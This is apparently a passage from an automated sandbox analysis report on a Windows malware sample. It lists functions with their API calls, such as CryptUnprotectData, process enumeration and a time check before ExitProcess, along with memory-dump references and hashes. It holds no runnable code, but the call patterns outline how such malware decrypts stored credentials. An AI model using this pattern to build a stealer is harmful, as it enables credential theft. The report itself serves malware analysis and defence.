                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0100C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0100C87C
                        • lstrcat.KERNEL32(?,01020B46), ref: 0100C943
                        • lstrcat.KERNEL32(?,01020B47), ref: 0100C957
                        • lstrcat.KERNEL32(?,01020B4E), ref: 0100C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 117bc1c5d383e42c52c33b046cad427d3998cab84b4b35cfddb3339aa6db559b
                        • Instruction ID: 7de99eed6d20543e5bde48993dfa249e197eee808e7ba8c5ccba80d10b610b58
                        • Opcode Fuzzy Hash: 117bc1c5d383e42c52c33b046cad427d3998cab84b4b35cfddb3339aa6db559b
                        • Instruction Fuzzy Hash: 954142B994421ADFEB20DF94DD89BFEB7B8BB44704F0042A8F509A7284D7745A84CF91
                        Function 01016920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0101696C
                        • sscanf.NTDLL ref: 01016999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010169B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010169C0
                        • ExitProcess.KERNEL32 ref: 010169DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 16e5dddb07eb53fdc40121228fb036d89dd6a64c8e671a1db9688968927932b1
                        • Instruction ID: 6ab07bcfdc5d88c5d5798f8d93dc657ce0c8445f96bf51b0feea3ace099d30f1
                        • Opcode Fuzzy Hash: 16e5dddb07eb53fdc40121228fb036d89dd6a64c8e671a1db9688968927932b1
                        • Instruction Fuzzy Hash: AE21FCB5D04209ABDF14EFE4E9499EEB7B9FF48300F04852EE506E3244EB355605CB65
                        Function 01007240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0100724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01007254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 01007281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 010072A4
                        • LocalFree.KERNEL32(?), ref: 010072AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 183f511dba7a2a71f3d2cda89d2d63bdedda979e3ff1fd6e98af41d9d282f1a9
                        • Instruction ID: 19420cdd6cc34d1034f424b6731372435a089a1d07a68781bd94eae1f6b459a1
                        • Opcode Fuzzy Hash: 183f511dba7a2a71f3d2cda89d2d63bdedda979e3ff1fd6e98af41d9d282f1a9
                        • Instruction Fuzzy Hash: E30100B5A80208BBEB24DF94DD4AF9D77B8EB44704F104145FB06AB2C4D670AA008B65
                        Function 01019600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0101961E
                        • Process32First.KERNEL32(01020ACA,00000128), ref: 01019632
                        • Process32Next.KERNEL32(01020ACA,00000128), ref: 01019647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0101965C
                        • CloseHandle.KERNEL32(01020ACA), ref: 0101967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 8c21bda65b2136d3f331d1dd2d9d9bdcbf700704a0b33a296442b135e26ff8d6
                        • Instruction ID: 8f5b985f625afb2adf8130423f9ccc412bcd7cbc3a0f870f4b97fb0306b12783
                        • Opcode Fuzzy Hash: 8c21bda65b2136d3f331d1dd2d9d9bdcbf700704a0b33a296442b135e26ff8d6
                        • Instruction Fuzzy Hash: 35011EB9A40208EBDB24DFA5D958BEDBBF8FB4C704F004588A94A97244D7389B40CF60
                        Function 013D4092 Relevance: 6.6, Strings: 4, Instructions: 1602COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0=_$6>du$q{~~$v7w
                        • API String ID: 0-3316258773
                        • Opcode ID: 14a725372e07dcc3ec17ce8bc693d60ee4cf05b1006e1db6d46b022e0144fa4c
                        • Instruction ID: 679a5187a3e38aee47f968ca41207f4221da60e7f823355a45dd423e259d869d
                        • Opcode Fuzzy Hash: 14a725372e07dcc3ec17ce8bc693d60ee4cf05b1006e1db6d46b022e0144fa4c
                        • Instruction Fuzzy Hash: E6B204F360C2049FE3046E2DEC8567AFBE5EF94720F1A463DEAC5D3744EA3598048696
                        Function 013D25B9 Relevance: 6.6, Strings: 4, Instructions: 1550COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: /N_$aB:i$hWz$w&Lm
                        • API String ID: 0-247770825
                        • Opcode ID: f15cbb399831aead8218fb3fa51ce0c258f56121323583b710b0c85b306a6207
                        • Instruction ID: 07631b8fca7094ddce6680c0f524d99dd099ad5d839847de64a026f3a7ecbbb2
                        • Opcode Fuzzy Hash: f15cbb399831aead8218fb3fa51ce0c258f56121323583b710b0c85b306a6207
                        • Instruction Fuzzy Hash: 5EB2F6F390C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC487744E63598458797
                        Function 01018EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,01005184,40000001,00000000,00000000,?,01005184), ref: 01018EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 36257a25567d1f3d346bec43600df8d4c92b3bd57971f4d2a10e00f00022925e
                        • Instruction ID: b127c1c78a8af653689aab15e276dcb4e0f71b235bd6f22fbb490deddffbefcb
                        • Opcode Fuzzy Hash: 36257a25567d1f3d346bec43600df8d4c92b3bd57971f4d2a10e00f00022925e
                        • Instruction Fuzzy Hash: 37111F74200205BFDB40CFA4E888FAB33EAAF89304F00D449FA598B245D739E941CB60
                        Function 01009AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                        • LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 82555faede864747760481a622e0d696d8c176619825d031b7d7445f88d1db72
                        • Instruction ID: 0705d5f4eed7cf83e7690fcc147bf0d089aa460deb5c04913889ba378db24217
                        • Opcode Fuzzy Hash: 82555faede864747760481a622e0d696d8c176619825d031b7d7445f88d1db72
                        • Instruction Fuzzy Hash: 7111A4B8240208AFEB11CF64D895FAA77B5FB89714F208058FA199F3C4C7B6A901CB50
                        Function 01017A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0189E2A8,00000000,?,01020E10,00000000,?,00000000,00000000), ref: 01017A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0189E2A8,00000000,?,01020E10,00000000,?,00000000,00000000,?), ref: 01017A7D
                        • wsprintfA.USER32 ref: 01017AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: dede425e5000fcb6eed3c3ce09f1ba1706aaf5782e380e1b5c17badca9b70b05
                        • Instruction ID: 60b255aa283e5f5b6af9d10cd140220d59bcf1a9319ef33f91886b4a8c1ad5b6
                        • Opcode Fuzzy Hash: dede425e5000fcb6eed3c3ce09f1ba1706aaf5782e380e1b5c17badca9b70b05
                        • Instruction Fuzzy Hash: 54115EB1945228EBEB208B54DC49FAAB7B8FB44721F00439AFA1A93284D7785A40CF51
                        Function 013C8495 Relevance: 5.3, Strings: 3, Instructions: 1596COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: V]$YD_~$b0^~
                        • API String ID: 0-2113818071
                        • Opcode ID: e00294dbfd31ff9d24bb6969276a2e8a643ab918e49a6906e32b0ac4d7eda1ed
                        • Instruction ID: 01a901cd2c7ea59fca702d78834738826e4d63b508f0193f1b37dad4e3ab1015
                        • Opcode Fuzzy Hash: e00294dbfd31ff9d24bb6969276a2e8a643ab918e49a6906e32b0ac4d7eda1ed
                        • Instruction Fuzzy Hash: 41B2F6F360C2009FE708AF2DEC8567ABBE5EF94320F16493DEAC587744EA3558058697
                        Function 013D0BD4 Relevance: 5.3, Strings: 3, Instructions: 1585COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n)o?$s41P$xOu
                        • API String ID: 0-739219942
                        • Opcode ID: 605a5f128bbdddc0aaf2ba708b841ef848ffd8fcd79955a9df22a4d738200f9f
                        • Instruction ID: 908943ca6d54dc264d8a70185cfa2fcd1ab750c2f24671d9d6e73f29d8bbfb94
                        • Opcode Fuzzy Hash: 605a5f128bbdddc0aaf2ba708b841ef848ffd8fcd79955a9df22a4d738200f9f
                        • Instruction Fuzzy Hash: 97A226F3A0C2049FD3046E2DEC85A7AFBE9EB94720F1A493DE6C4C7744EA3558058796
                        Function 01013720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(0101E118,00000000,00000001,0101E108,00000000), ref: 01013758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 010137B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
